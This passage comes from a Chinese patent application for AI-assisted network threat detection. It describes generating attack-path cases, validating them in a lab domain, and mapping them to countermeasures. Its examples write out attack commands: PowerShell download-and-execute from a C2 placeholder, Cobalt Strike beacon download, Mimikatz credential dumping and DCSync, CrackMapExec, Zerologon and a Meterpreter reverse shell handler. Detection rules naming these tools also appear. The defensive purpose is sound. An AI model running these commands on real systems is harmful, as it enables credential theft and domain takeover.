3、使用CrackMapExec横向移动，收集更多凭据：crackmapexec smb<ip_address_range>-u<username>-p<password>--sam

4、攻击域控制器，获取域管理员权限：mimikatz"privilege::debug""lsadump::dcsync/domain:<domain_name>/user:<username>/all"exit

威胁检测建议部分：

Suricata规则：

1.检测PowerShell Empire流量：alert tcp any any->any any(msg:"PowerShellEmpire traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000001；rev:1；)

2.检测Cobalt Strike流量：alert tcp any any->any any(msg:"Cobalt Striketraffic detected"；content:"|69 6e 69 74 5f 73 74 61 67 65|"；flow:established,to_server；sid:1000002；rev:1；)

3.检测Metasploit Meterpreter流量：alert tcp any any->any any(msg:"Metasploit Meterpreter traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000003；rev:1；)

Windows终端4688日志检测规则：

1.检测Mimikatz执行：EventID＝4688AND CommandLine:*mimikatz*

2.检测BloodHound执行：EventID＝4688AND CommandLine:*BloodHound*

3.检测CrackMapExec执行：EventID＝4688AND CommandLine:*CrackMapExec*

S204，根据输出信息，确定目标业务场景的安全威胁信息。

考虑到智能内容生成模块输出的输出信息是按照案例部分和威胁检测建议部分这两类进行分类输出，而案例部分中的不同案例对应有不同的威胁检测建议。

因此，本申请可通过从智能内容生成模块输出的输出信息中提取目标业务场景的至少一个初始安全威胁信息。之后，对每个初始安全威胁信息进行模拟验证，以从至少一个初始安全威胁信息中筛选最终的安全威胁信息，其中，最终的安全威胁信息为目标业务场景的安全威胁信息。

上述一个初始安全威胁信息包括一个案例(具体指案例部分中的任一例子)，及与该案例对应的威胁检测建议。

在一些可选的实现方式中，从智能内容生成模块输出的输出信息中提取目标业务场景的至少一个初始安全威胁信息，具体可按照预先设置的提取规则，从输出信息中提取初始安全威胁信息。

其中，预先设置的提取规则可选为任意提取安全威胁信息的策略或方式。例如，预先设置的提取规则为提取策略，那么该提取策略可以为提取一个案例和该案例对应的威胁检测建议。

以步骤S203步骤中的示例进行继续说明，那么从输出信息中提取的至少一个初始安全威胁信息如下：

初始安全威胁信息1：

例子1：

攻击路径：邮件钓鱼->恶意宏->PowerShell Empire->Mimikatz->横向移动->域控制器

描述：A方通过发送带有恶意宏的Word文档进行邮件钓鱼攻击，诱使员工打开并执行PowerShell远控回连脚本，通过脚本连接到A方的C2服务器，建立持久控制。后续A方使用Mimikatz获取内存中的凭据并利用获取的凭据进行横向移动，寻找域控制器，最终使用凭据访问域控制器，获取域管理员权限。

风险攻击路径利用：

1、运行恶意宏：powershell-ExecutionPolicy Bypass-File"恶意宏.ps1"

2、使用PowerShell Empire连接C2服务器：powershell-nop-w hidden-c"IEX(New-Object Net.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"

3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit

4、CrackMapExec横向移动，攻击域控制器：crackmapexec smb目标IP地址/子网-u用户名-p密码

威胁检测建议：

Suricata规则：

1.检测PowerShell Empire流量：alert tcp any any->any any(msg:"PowerShell Empire traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000001；rev:1；)

Windows终端4688日志检测规则：

1.检测Mimikatz执行：EventID＝4688AND CommandLine:*mimikatz*

初始安全威胁信息2：

例子2：

攻击路径：网络钓鱼->CVE-2021-34527(PrintNightmare)->Cobalt Strike->BloodHound->域控制器

描述：A方通过设置一个伪装的企业登录页面进行网络钓鱼攻击，诱使员工输入凭据。利用PrintNightmare漏洞执行远程代码并获取***权限。部署Cobalt Strike Beacon，与C2服务器建立持久连接。使用BloodHound分析域内的权限关系，寻找域控制器，最终利用找到的路径攻击域控制器，获取域管理员权限。

风险攻击路径利用：

1、利用PrintNightmare漏洞获取***权限：powershell-c"(New-ObjectNet.WebClient).DownloadFile('https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_23/impacket-0.9.23.tar.gz','impacket-0.9.23.tar.gz')；tar xvzf impacket-0.9.23.tar.gz；cd impacket-0.9.23；pythonsetup.py install；python examples/ntlmrelayx.py-smb2support-t目标IP地址-u用户名-p密码"

2、部署Cobalt Strike Beacon：powershell-c"(New-Object Net.WebClient).DownloadFile('http://C2服务器IP地址:8000/beacon.bin','beacon.bin')；cmd.exe/c'beacon.bin'"

3、使用BloodHound分析域内的权限关系：将Cobalt Strike Beacon下载到本地，并上传到目标***，然后在Cobalt Strike控制台中执行以下命令：load aggcreds和usesharphound，接着导出BloodHound图表，并在BloodHound中分析域内的权限关系。

4、寻找域控制器：在BloodHound中查找与域控制器有关的信息，例如具有DCSync权限的账户、域控制器的IP地址等。

5、攻击域控制器：使用Mimikatz工具提取域管理员的凭据，并使用这些凭据登录域控制器，获取域管理员权限。命令行如下：mimikatz.exe"lsadump::dcsync/user:DOMAIN\krbtgt/domain:DOMAIN.local/authuser:USERNAME/authdomain:DOMAIN/authpassword:PASSWORD"

威胁检测建议：

Suricata规则：

1.检测Cobalt Strike流量：alert tcp any any->any any(msg:"Cobalt Striketraffic detected"；content:"|69 6e 69 74 5f 73 74 61 67 65|"；flow:established,to_server；sid:1000002；rev:1；)

Windows终端4688日志检测规则：

1.检测BloodHound执行：EventID＝4688AND CommandLine:*BloodHound*

初始安全威胁信息3：

例子3：

攻击路径：恶意软件->Zerologon(CVE-2020-1472)->Metasploit->CrackMapExec->域控制器

描述：A方通过恶意软件感染员工计算机，利用Zerologon漏洞获取域控制器的***权限，使用Metasploit部署Meterpreter与C2服务器建立持久连接，使用CrackMapExec横向移动，收集更多凭据，最终攻击域控制器，获取域管理员权限。

风险攻击路径利用：

1、利用Zerologon漏洞获取域控制器***权限：python3 exploit.py-t<ip_address>-d<domain_name>-n<netbios_name>

2、使用Metasploit部署Meterpreter与C2服务器建立持久连接：

msfconsole

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST<local_ip_address>

set LPORT<local_port>

run

3、使用CrackMapExec横向移动，收集更多凭据：crackmapexec smb<ip_address_range>-u<username>-p<password>--sam

4、攻击域控制器，获取域管理员权限：mimikatz"privilege::debug""lsadump::dcsync/domain:<domain_name>/user:<username>/all"exit

威胁检测建议：

Suricata规则：

1.检测Metasploit Meterpreter流量：alert tcp any any->any any(msg:"Metasploit Meterpreter traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000003；rev:1；)

Windows终端4688日志检测规则：

1.检测CrackMapExec执行：Event ID＝4688AND CommandLine:*CrackMapExec*

考虑到智能内容生成模块基于输入信息提供的输出信息，可能出现与输入信息不对应，即出现“答非所问”情况。针对这种情况，本申请在检测到用户发送的信息提取指令，比如用户点击显示界面中的筛选控件等时，可以确定智能内容生成模块提供的输出信息与输入信息未对应。此时，本申请可以根据预设可用关键词从输出信息中筛选可用的初始安全威胁信息。如果从输出信息中筛选出可用的初始安全威胁信息，则可以对可用的初始安全威胁信息进行模拟验证，以获取最终的安全威胁信息。如果从输出信息中未筛选出可用的初始安全威胁信息，则控制智能内容生成模块根据输入信息重新确定输出信息，直至从最新的输出信息中提取到目标业务场景的初始安全威胁信息为止。由此，可以确保从智能内容生成模块提供的输出信息中获取到针对目标业务场景的一个或一个以上的初始安全威胁信息，进而基于该初始安全威胁信息对目标业务场景进行威胁检测。

其中，预设可用关键词可根据业务场景预先设置的一些可用关键词，比如目标业务场景为办公网，那么可用关键词可以为【A方】、【B方】或者【攻击】等，本申请中对预设可用关键词不做任何限制。

在本申请中，根据预设可用关键词从输出信息中筛选可用的初始安全威胁信息，可以理解为确定哪些输出信息包括有预设可用关键词，并基于包括有预设可用关键词的输出信息确定可用的初始安全初始威胁信息。

此外，控制智能内容生成模块根据输入信息重新确定输出信息，可以理解为控制智能内容生成模块重新运行应答模型，以使应答模型根据输入信息重新获取与输入信息对应的一批新的输出信息。

也就是说，本申请还包括：响应于确定所述输出信息与所述输入信息未对应，根据预设可用关键词从所述输出信息中筛选可用的初始安全威胁信息；响应于从所述输出信息中未筛选出可用的初始安全威胁信息，控制所述智能内容生成模块根据所述输入信息重新确定输出信息，直至从最新的输出信息中提取到所述目标业务场景的初始安全威胁信息为止。

在一些可选的实现方式中，提取到目标业务场景的初始安全威胁信息之后，本申请对每个初始安全威胁信息进行模拟验证，以从至少一个初始安全威胁信息中筛选最终的安全威胁信息，可包括如下步骤：

第一步，模拟验证的环境配置和自动化命令脚本配置。

第二步，将每个初始安全威胁信息作为命令输入至验证进程中，以通过验证进程运行每个初始安全威胁信息，得到每个初始安全威胁信息的运行结果。

第三步，根据每个初始安全威胁信息的运行结果，从至少一个初始安全威胁信息中筛选最终的安全威胁信息。

在本申请中，根据每个初始安全初始威胁信息的运行结果，从至少一个初始安全威胁信息中筛选最终的安全威胁信息，具体包括：解析每个初始安全威胁信息的运行结果；响应于检测到任意初始安全威胁信息的运行结果存在预设返回信息，确定初始安全威胁信息为最终的安全威胁信息。

其中，预设返回信息可以是预先设置的任意信息，比如success、true或者1等，本申请对此不做任何限制。

下面以对前述提取到的初始安全威胁信息1进行模拟验证为例进行说明。

具体的，首先搭建模拟验证的环境配置和自动化命令脚本配置。其中，环境配置包括如下信息：

1、域控制器AA，IP为192.168.0.x，主域控

2、域成员主机BB，IP为192.168.0.y，攻击机(充当C2服务器)

3、域成员主机CC，IP为192.168.0.z，靶机(辅域控)

自动化命令脚本配置包括如下信息：

自动化命令脚本S1和自动化命令脚本S2。

其中，自动化命令脚本S1包括：构造带有恶意宏的Word文档，其中宏携带含PowerShell恶意远控回连命令，如初始安全威胁信息1中风险攻击路径利用中【2、使用PowerShell Empire连接C2服务器】，包含powershell-nop-whidden-c"IEX(New-ObjectNet.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"内容。

自动化命令脚本S2包括：构建C2服务器的脚本命令。

之后，通过域控制器AA下发组策略推送自动化命令脚本给域成员主机BB和域成员主机CC，以尝试以主机BB作为攻击机，主机CC作为靶机，模拟验证初始安全威胁信息1中的风险攻击路径。具体验证过程可参见图3，且验证过程可包括如下步骤：

1、域控制器AA可通过组策略命令或者横向移动命令将该自动化脚本S2传输给域成员主机BB，以在BB主机上构造攻击机环境。

2、域控制器AA通过自动化脚本S1构造带有恶意宏的Word文档，然后通过组策略命令或者横向移动命令将该word文档文件传输给域成员主机CC，并模拟点击打开word文档。

3、当域成员主机BB的C2服务器发现有域成员主机CC的回连会话，可认定初始安全威胁信息1中【风险攻击路径】的【1、运行恶意宏，2、使用PowerShell Empire连接C2服务器】验证成功。此时，进入下一步。

4、继续通过域控制器AA使用组策略命令或者横向移动命令将初始安全威胁信息1中【风险攻击路径】的剩余内容以命令行或其他运行方式传递给域成员主机BB，以通过域成员主机BB上的C2服务器下发[3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit]等命令，通过观察域成员主机BB上的C2服务器上执行的回显信息，并抓取相关凭据，可通过抓取凭据进入下一步利用，判断出初始安全威胁信息1中【风险攻击路径】的有效性。

5、继续通过域控制器AA使用组策略命令或者横向移动命令将初始安全威胁信息1中【风险攻击路径】的剩余内容以命令行或其他运行方式传递给域成员主机BB，以通过域成员主机BB上的C2服务器下发[4、CrackMapExec横向移动，攻击域控制器：crackmapexecsmb目标IP地址/子网-u用户名-p密码]等命令，得到域成员主机BB上的C2服务器上执行的回显信息。之后，将当前步骤域成员主机BB上的C2服务器上执行的回显信息和上述步骤4抓取的凭据进行拼接，得到新命令。进而，通过域成员主机BB上的C2服务器得到新命令的回显信息。然后，根据新命令的回显信息确定初始安全威胁信息1中【风险攻击路径】的有效性和真实性。

其中，根据回显信息确定初始安全威胁信息1中【风险攻击路径】的有效性和真实性，具体是解析初始安全威胁信息1对应回显信息中是否存在预设返回信息。如果回显信息中存在预设返回信息，则确定初始安全威胁信息1中【风险攻击路径】有效且真实。如果回显信息中不存在预设返回信息，则确定初始安全威胁信息1中【风险攻击路径】无效且不真实。

假设确定初始安全威胁信息1中【风险攻击路径】有效且真实时，那么初始安全威胁信息1的验证结果可选的如下：

针对当前办公网业务环境下，存在以下风险：

风险路径：邮件钓鱼->恶意宏->PowerShell Empire->Mimikatz->横向移动->域控制器

描述：A方通过发送带有恶意宏的Word文档进行邮件钓鱼攻击，诱使员工打开并执行PowerShell远控回连脚本，通过脚本连接到A方的C2服务器，建立持久控制。后续A方使用Mimikatz获取内存中的凭据并利用获取的凭据进行横向移动，寻找域控制器，最终使用凭据访问域控制器，获取域管理员权限。

【已验证】-风险攻击路径利用：

1、运行恶意宏：powershell-ExecutionPolicy Bypass-File"恶意宏.ps1"

2、使用PowerShell Empire连接C2服务器：powershell-nop-w hidden-c"IEX(New-Object Net.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"

3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit

4、CrackMapExec横向移动，攻击域控制器：crackmapexec smb目标IP地址/子网-u用户名-p密码

威胁检测建议：

Suricata规则：

1.检测PowerShell Empire流量：alert tcp any any->any any(msg:"PowerShell Empire traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000001；rev:1；)

Windows终端4688日志检测规则：

1.检测Mimikatz执行：EventID＝4688AND CommandLine:*mimikatz*

S205，根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议。

S206，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。

本申请提供的一种网络安全威胁检测方法，通过获取目标业务场景的关键词信息，以根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息，进而根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请通过利用智能内容生成模块和网络安全对策知识图谱，可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

下面结合图4，对上述实施例中根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议进行进一步解释说明。

如图4所示，该方法可以包括如下步骤：

S301，获取目标业务场景的关键词信息。

S302，根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息。

S303，从安全威胁信息中提取查询关键词。

考虑到安全威胁信息中存在风险路径，而风险路径中包括安全威胁信息中的重要信息。因此，从安全威胁信息中提取查询关键词，可选的从安全威胁信息中的风险路径中提取，由此可以提取到安全威胁信息中重要信息，从而为后续确定安全威胁信息对应的安全建议提供有利条件。

在一些可选的实现方式中，从安全威胁信息中提取查询关键词，可通过各种提取方法实现，例如基于统计的关键词提取方法，从安全威胁信息中提取查询关键词；或者，基于机器学习的关键词提取方法，从安全威胁信息中提取查询关键词；又或者，基于Word2Vec词聚类的文本关键词提取方法，从安全威胁信息中提取查询关键词，等等，此处对其不做任何限制。

上述基于各种提取方法从安全威胁信息中提取查询关键词的实现过程，为常规技术方案，具体可参见已有方案，此处对其不做过多赘述。

S304，根据查询关键词，在网络安全对策知识图谱中确定安全威胁信息对应的安全建议。

可选的，将查询关键词作为搜索词输入至网络安全对策知识图谱中，以确定网络安全对策知识图谱中查询是否存在该查询关键词。如果在网络安全对策知识图谱中查询到该查询关键词，则获取与该查询关键词对应的安全建议。将获取到的安全建议确定为安全威胁信息对应的安全建议。

示例性的，假设目标业务场景为：办公网，且办公网的安全威胁信息如下：

风险路径：邮件钓鱼->恶意宏->PowerShell Empire->Mimikatz->横向移动->域控制器

描述：A方通过发送带有恶意宏的Word文档进行邮件钓鱼攻击，诱使员工打开并执行PowerShell远控回连脚本，通过脚本连接到A方的C2服务器，建立持久控制。后续A方使用Mimikatz获取内存中的凭据并利用获取的凭据进行横向移动，寻找域控制器，最终使用凭据访问域控制器，获取域管理员权限。

【已验证】-风险攻击路径利用：

1、运行恶意宏：powershell-ExecutionPolicy Bypass-File"恶意宏.ps1"

2、使用PowerShell Empire连接C2服务器：powershell-nop-w hidden-c"IEX(New-Object Net.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"

3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit

4、CrackMapExec横向移动，攻击域控制器：crackmapexec smb目标IP地址/子网-u用户名-p密码

威胁检测建议：

Suricata规则：

1.检测PowerShell Empire流量：alert tcp any any->any any(msg:"PowerShell Empire traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000001；rev:1；)

Windows终端4688日志检测规则：

1.检测Mimikatz执行：EventID＝4688AND CommandLine:*mimikatz*

那么可从上述安全威胁信息中提取查询关键词为：PowerShell Empire。进而，根据查询关键词PowerShell Empire，在网络安全对策知识图谱中查询与该查询关键词对应的安全建议。并将该查询关键词对应的安全建议确定为安全威胁信息对应的安全建议。相应的，上述示例办公网的安全威胁信息对应的安全建议如下：

PowerShell Empire

映射威胁技术：T1059.001-PowerShell Execution

相关威胁技术安全建议：File Removal、Local File Permissions、.....

具体安全建议如下：

File Removal：On Windows systems,antivirus(AV)software should be usedto safely and permanently remove malicious files.AV software may firstquarantine a suspected malicious file,which is the process of moving a filefrom its original location to a new location and makes changes so that itcannot be executed.Users can then verify that the file is not benign and thenpermanently delete it.

Local File Permissions：Restricting access to a local file byconfiguring operating system functionality.

………

在一些可选的实现方式中，与查询关键词对应的安全建议可能有多个，那么本申请可以直接将多个安全建议关联的详细信息确定为安全威胁信息对应的安全建议。也可以通过显示界面显示与查询关键词对应的多个安全建议选项，使得用户可以点击每个安全建议选项，以打开每个安全建议选项关联的详细信息，从而用户不仅可以查看与查询关键词对应的多个安全建议选型，同时还可以查看每个安全建议关联的详细信息。

考虑到一个查询关键词可能与网络安全对策知识图谱中的多个安全建议存在对应关系。即，查询关键词与网络安全对策知识图谱中的安全建议之间的对应关系为一对多。那么，针对这种情况，本申请根据查询关键词，在网络安全对策知识图谱中确定安全威胁信息对应的安全建议时，根据查询关键词，在网络安全对策知识图谱中确定与查询关键词对应的候选安全建议数量可能为至少两个。此时，可根据查询关键词在安全威胁信息中的上下文信息，确定每个候选安全建议和查询关键词之间的匹配度。进而，根据匹配度，从所有候选安全建议中确定安全威胁信息对应的安全建议。

本申请中，确定每个候选安全建议和查询关键词之间的匹配度，可以通过计算查询关键词在安全威胁信息中的上下文信息与每个候选安全建议之间的相似度来实现。其中，相似度越高，说明候选安全建议和查询关键词之间越匹配，反之越不匹配。

在一些可选的实现方式中，计算查询关键词在安全威胁信息中的上下文信息与每个候选安全建议之间的相似度时，可将查询关键词在安全威胁信息中的上下问信息转换成第一向量，同时将每个候选安全建议或每个候选安全建议关联的详细信息转换成第二向量。进而，利用相似度计算方法，比如欧式距离计算方法、曼哈顿距离计算方法、余弦距离计算方法或者其他计算方法，根据第一向量和第二向量计算查询关键词在安全威胁信息中的上下文信息与每个候选安全建议之间的相似度。

其中，将文本信息转换成向量，以及计算相似度过程为常规技术，此处对其不做过多赘述。

在一些可实现方式中，根据计算到的匹配度，从所有候选安全建议中确定安全威胁信息对应的安全建议，具体包括：确定所有匹配度中的最高匹配度；将最高匹配度对应的候选安全建议，确定为安全威胁信息对应的安全建议。

由于从所有匹配度中确定出来的最高匹配度的数量可能有多个，那么此时从多个最高匹配度中确定安全威胁信息对应的安全建议，可包括如下情况：

情况一

响应于检测最高匹配度的数量为至少两个，从所有最高匹配度对应的候选安全建议中选取任一候选安全建议作为安全威胁信息对应的安全建议。

也就是说，当最高匹配度的数量为多个时，本申请可以采用随机选取方式将任一最高匹配度对应的候选安全建议作为安全威胁信息对应的安全建议。或者，也可以按照最高匹配度对应的候选安全建议的显示顺序，将显示在第一位置的候选安全建议作为安全威胁信息对应的安全建议。当然除了上述选取方式之外还可以采用其他方式选取任一候选安全建议作为安全威胁信息对应的安全建议，比如将显示在最后位置上的候选安全建议作为安全威胁信息对应的安全建议等等，本申请对此不做任何限制。

情况二

响应于检测最高匹配度的数量为至少两个，将所有最高匹配度对应的候选安全建议作为安全威胁信息对应的安全建议。

也就是说，当最高匹配度的数量有多个时，可将每个最高匹配度对应的候选安全建议均作为安全威胁信息对应的安全建议。

在一些可选的实现方式中，考虑到当最高匹配度的数量为多个，将所有最高匹配度对应的任一候选安全建议作为安全威胁信息对应的安全建议，或者将所有最高匹配度对应的候选安全建议作为安全威胁信息对应的安全建议时，可能不满足用户针对目标业务场景的威胁检测期望。

此时，用户可以通过点击显示界面中的返回控件，以向电子设备发送返回指令。进而，电子设备根据检测到的返回控件触发操作进行响应，以显示多个最高匹配度对应的候选安全建议。用户可根据检测期望手动从多个最高匹配度对应的候选安全建议中选择任一候选安全建议，进而电子设备响应用户针对该任一最高匹配度对应的候选安全建议触发操作，将该触发的候选安全建议确定为安全威胁信息对应的安全建议。从而当电子设备按照预设规则向用户提供的安全威胁信息对应的安全建议不满足用户期望时，用户还可以手动从多个候选安全建议中选择符合期望的目标安全建议，从而可以满足用户针对任意目标业务场景的个性化网络安全检测需求。

S305，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。

可选的，可将安全威胁信息和安全建议进行拼接，以生成目标业务场景的安全威胁检测报告。

示例性的，假设目标业务场景为：办公网，那么将办公网的安全威胁信息和安全建议进行拼接，生成目标业务场景的安全威胁检测报告如下：

办公网的安全威胁信息如下：

风险路径：邮件钓鱼->恶意宏->PowerShell Empire->Mimikatz->横向移动->域控制器

描述：A方通过发送带有恶意宏的Word文档进行邮件钓鱼攻击，诱使员工打开并执行PowerShell远控回连脚本，通过脚本连接到A方的C2服务器，建立持久控制。后续A方使用Mimikatz获取内存中的凭据并利用获取的凭据进行横向移动，寻找域控制器，最终使用凭据访问域控制器，获取域管理员权限。

【已验证】-风险攻击路径利用：

1、运行恶意宏：powershell-ExecutionPolicy Bypass-File"恶意宏.ps1"

2、使用PowerShell Empire连接C2服务器：powershell-nop-w hidden-c"IEX(New-Object Net.WebClient).downloadString('http://C2服务器IP地址:8000/PowerShellEmpire.ps1')"

3、Mimikatz获取凭据：mimikatz.exe"sekurlsa::logonpasswords"exit

4、CrackMapExec横向移动，攻击域控制器：crackmapexec smb目标IP地址/子网-u用户名-p密码

威胁检测建议：

Suricata规则：

1.检测PowerShell Empire流量：alert tcp any any->any any(msg:"PowerShell Empire traffic detected"；content:"|00 00 00 00|"；flow:established,to_server；sid:1000001；rev:1；)

Windows终端4688日志检测规则：

1.检测Mimikatz执行：EventID＝4688AND CommandLine:*mimikatz*

办公网的安全威胁信息对应的安全建议如下：

PowerShell Empire

映射威胁技术：T1059.001-PowerShell Execution

相关威胁技术安全建议：File Removal、Local File Permissions、.....

具体安全建议如下：

File Removal：On Windows systems,antivirus(AV)software should be usedto safely and permanently remove malicious files.AV software may firstquarantine a suspected malicious file,which is the process of moving a filefrom its original location to a new location and makes changes so that itcannot be executed.Users can then verify that the file is not benign and thenpermanently delete it.

Local File Permissions：Restricting access to a local file byconfiguring operating system functionality.

………

本申请提供的一种网络安全威胁检测方法，通过获取目标业务场景的关键词信息，以根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息，进而根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请通过利用智能内容生成模块和网络安全对策知识图谱，可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

下面参照附图5，对本申请实施例提出的一种网络安全威胁检测装置进行描述。图5是本申请实施例提供的一种网络安全威胁检测装置的示意性框图。

如图5所示，该网络安全威胁检测装置400包括：信息获取模块410，威胁确定模块420、建议确定模块430和结果获取模块440。

其中，信息获取模块410，用于获取目标业务场景的关键词信息；

威胁确定模块420，用于根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息；

建议确定模块430，用于根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议；

结果获取模块440，用于根据所述安全威胁信息和所述安全建议，生成所述目标业务场景的安全威胁检测报告。

本申请实施例的一种可选实现方式，所述威胁确定模块420，包括：

第一确定单元，用于根据所述关键词信息，确定所述智能内容生成模块的输入信息；

第二确定单元，用于将所述输入信息输入至所述智能内容生成模块中，通过所述智能内容生成模块运行应答模型，以使所述应答模型根据所述输入信息确定输出信息；

第三确定单元，用于根据所述输出信息，确定所述目标业务场景的安全威胁信息。

本申请实施例的一种可选实现方式，所述第一确定单元，具体用于：

基于询问话术模板库，确定并显示与所述关键词信息对应的至少一个候选询问话术模板；

响应于对任一候选询问话术模板的编辑操作，生成目标询问话术，将所述目标询问话术作为所述智能内容生成模块的输入信息。

本申请实施例的一种可选实现方式，所述第三确定单元，具体用于：

从所述输出信息中提取所述目标业务场景的至少一个初始安全威胁信息；

对每个所述初始安全威胁信息进行模拟验证，以从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，其中所述最终的安全威胁信息为所述目标业务场景的安全威胁信息。

本申请实施例的一种可选实现方式，所述第三确定单元，还用于：

将每个所述初始安全威胁信息作为命令输入至验证进程中，以通过所述验证进程运行每个所述初始安全威胁信息，得到每个所述初始安全威胁信息的运行结果；

根据每个所述初始安全威胁信息，从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息。

本申请实施例的一种可选实现方式，所述第三确定单元，还用于：

解析每个所述初始安全威胁信息的运行结果；

响应于检测到任意所述初始安全威胁信息的运行结果存在预设返回信息，确定所述初始安全威胁信息为最终的安全威胁信息。

本申请实施例的一种可选实现方式，所述第三确定单元，还用于：

响应于确定所述输出信息与所述输入信息未对应，根据预设可用关键词从所述输出信息中筛选可用的初始安全威胁信息；

响应于从所述输出信息中未筛选出可用的初始安全威胁信息，则控制所述智能内容生成模块根据所述输入信息重新确定输出信息，直至从最新的输出信息中提取到所述目标业务场景的初始安全威胁信息为止。

本申请实施例的一种可选实现方式，所述建议确定模块430，包括：

提取单元，用于从所述安全威胁信息中提取查询关键词；

第四确定单元，用于根据所述查询关键词，在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议。

本申请实施例的一种可选实现方式，当查询关键词与所述网络安全对策知识图谱中的安全建议之间的对应关系为一对多时，所述第四确定单元，具体用于：

根据所述查询关键词，在所述网络安全对策知识图谱中确定与所述查询关键词对应的至少两个候选安全建议；

根据所述查询关键词在所述安全威胁信息中的上下文信息，确定每个所述候选安全建议和所述查询关键词之间的匹配度；

根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议。

本申请实施例的一种可选实现方式，所述第四确定单元，还用于：

确定所有匹配度中的最高匹配度；

将所述最高匹配度对应的候选安全建议，确定为所述安全威胁信息对应的安全建议。

本申请实施例的一种可选实现方式，所述第四确定单元，还用于：

响应于检测最高匹配度的数量为至少两个，从所有最高匹配度对应的候选安全建议中选取任一候选安全建议作为所述安全威胁信息对应的安全建议；

或者，

响应于检测最高匹配度的数量为至少两个，将所有最高匹配度对应的候选安全建议作为所述安全威胁信息对应的安全建议。

本申请实施例的一种可选实现方式，所述建议确定模块430，还包括：

第一响应单元，用于响应于返回控件的触发操作，显示所述最高匹配度对应的候选安全建议；

第二响应单元，用于响应于对任一所述最高匹配度对应的候选安全建议的触发操作，将所述候选安全建议确定为所述安全威胁信息对应的安全建议。

本申请实施例的一种可选实现方式，所述获取模块，具体用于：

根据所述目标业务场景的标识信息，获取所述关键词信息，其中所述目标业务场景的标识信息用于唯一标识相应的目标业务场景；

和/或，

根据所述目标业务场景面临的安全威胁，获取所述关键词信息。

本申请提供的一种网络安全威胁检测装置，通过获取目标业务场景的关键词信息，以根据关键词信息和智能内容生成模块，确定目标业务场景的安全威胁信息，进而根据网络安全对策知识图谱，确定安全威胁信息对应的安全建议，根据安全威胁信息和安全建议，生成目标业务场景的安全威胁检测报告。本申请通过利用智能内容生成模块和网络安全对策知识图谱，可以实现自动化检测各个业务场景面临的各类网络安全攻击技术，可以降低网络安全风险的检测成本，提升网络安全风险的检测效率，同时可以提升对新型网络安全攻击技术的安全风险检测能力，从而能够及时地发现各个业务面临的新型网络攻击技术。

应理解的是，装置实施例与方法实施例可以相互对应，类似的描述可以参照方法实施例。为避免重复，此处不再赘述。具体地，图5所示的装置400可以执行图1对应的方法实施例，并且装置400中的各个模块的前述和其它操作和/或功能分别为了实现图1中的各个方法中的相应流程，为了简洁，在此不再赘述。

上文中结合附图从功能模块的角度描述了本申请实施例的装置400。应理解，该功能模块可以通过硬件形式实现，也可以通过软件形式的指令实现，还可以通过硬件和软件模块组合实现。具体地，本申请实施例中的方法实施例的各步骤可以通过处理器中的硬件的集成逻辑电路和/或软件形式的指令完成，结合本申请实施例公开的方法的步骤可以直接体现为硬件译码处理器执行完成，或者用译码处理器中的硬件及软件模块组合执行完成。可选地，软件模块可以位于随机存储器，闪存、只读存储器、可编程只读存储器、电可擦写可编程存储器、寄存器等本领域的成熟的存储介质中。该存储介质位于存储器，处理器读取存储器中的资讯，结合其硬件完成上述方法实施例中的步骤。

图6是本申请实施例提供的一种电子设备的示意性框图。

如图6所示，该电子设备500可包括：

存储器510和处理器520，该存储器510用于存储计算机程序，并将该程序代码传输给该处理器520。换言之，该处理器520可以从存储器510中调用并运行计算机程序，以实现本申请实施例中的网络安全威胁检测方法。

例如，该处理器520可用于根据该计算机程序中的指令执行上述方法实施例提供的网络安全威胁检测方法。

在本申请的一些实施例中，该处理器520可以包括但不限于：

通用处理器、数字信号处理器(Digital Signal Processor，DSP)、专用集成电路(Application Specific Integrated Circuit，ASIC)、现场可编程门阵列(FieldProgrammable Gate Array，FPGA)或者其他可编程逻辑器件、分立门或者晶体管逻辑器件、分立硬件组件等等。

在本申请的一些实施例中，该存储器510包括但不限于：

